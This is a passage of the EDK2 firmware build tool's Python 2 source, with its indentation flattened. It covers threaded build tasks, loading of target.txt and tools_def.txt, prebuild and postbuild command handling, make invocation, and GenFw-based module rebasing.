# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency == None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
    # @param Command A list or string containing the command to run
    # @param WorkingDir The directory in which the command will run
#
def _CommandThread(self, Command, WorkingDir):
try:
LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
            # TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
            # indicate that a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
    # @param BaseName The base name of the image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
    # @param ImageClass The PeImageClass object describing the image
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
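        # Round the image size up to the next 4 KB (0x1000) page boundary; note that
        # this always adds at least one page, even when Size is already page-aligned.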
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
    # The constructor loads all necessary configurations, parses the platform,
    # modules and packages, and then establishes a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
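        # Net effect of the logic above: --conf takes precedence over the CONF_PATH
        # environment variable, which takes precedence over the default <WORKSPACE>/Conf.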
if BuildOptions.DisableCache:
self.Db = WorkspaceDatabase(":memory:")
else:
self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory,'.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
        # print a dot character while doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList == None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append("MSFT")
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber == None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
self.ThreadNumber = 1
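        # Thread-count precedence: -n on the command line, then
        # MAX_CONCURRENT_THREAD_NUMBER from target.txt, falling back to a single thread.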
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
        # Allow case-insensitive matching for values from the command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
if not self.Db_Flag:
self.Db.InitDatabase()
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines.keys():
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db.InitDatabase()
self.Db_Flag = True
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines.keys():
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
                BuildStr += ' -p ' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
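    # The returned string is appended to the PREBUILD/POSTBUILD command lines; an
    # illustrative result (placeholder values) would be:
    #   " -b DEBUG -a X64 -t <TOOL_CHAIN_TAG> -p <Platform>.dsc --conf=<ConfDir> all"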
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
            # The purpose of the .PrebuildEnv file is to capture environment variable settings made by the
            # prebuild script and preserve them for the rest of the main build, because the child process
            # environment evaporates as soon as the process exits and cannot be read afterwards.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory,'.cache','.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
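                # Parse NAME=value lines (the output of 'set' on Windows or 'env'
                # elsewhere); lines without an '=' separator are filtered out.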
envs = itertools.imap(lambda l: l.split('=',1), envs)
envs = itertools.ifilter(lambda l: len(l) == 2, envs)
envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
    ## Build a module or platform
    #
    # Create AutoGen code and makefile for a module or platform, and then launch
    # the "make" command to build it
    #
    # @param Target The target of the build command
    # @param AutoGenObject The AutoGen object of the module or platform to build
    # @param CreateDepsCodeFile Flag indicating whether to create code for
    # dependent modules/Libraries
    # @param CreateDepsMakeFile Flag indicating whether to create makefiles for
    # dependent modules/Libraries
    # @param BuildModule Flag indicating whether a module (rather than a platform)
    # is being built
    #
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
        # skip file generation for the cleanxxx, run, and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
    ## Build a module or platform
    #
    # Create AutoGen code and makefile for a module or platform, and then launch
    # the "make" command to build it
    #
    # @param Target The target of the build command
    # @param AutoGenObject The AutoGen object of the module or platform to build
    # @param CreateDepsCodeFile Flag indicating whether to create code for
    # dependent modules/Libraries
    # @param CreateDepsMakeFile Flag indicating whether to create makefiles for
    # dependent modules/Libraries
    # @param BuildModule Flag indicating whether a module (rather than a platform)
    # is being built
    #
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
        # skip file generation for the cleanxxx, run, and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
InfFileNameList = ModuleList.keys()
#InfFileNameList.sort()
for InfFile in InfFileNameList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
            # Collect function addresses from the map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
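                    # Function symbol lines are assumed to follow the linker map layout
                    #   <section:offset>  <name>  <address>  f  <object file>
                    # i.e. at least five columns with an 'f' flag in the fourth column.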
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
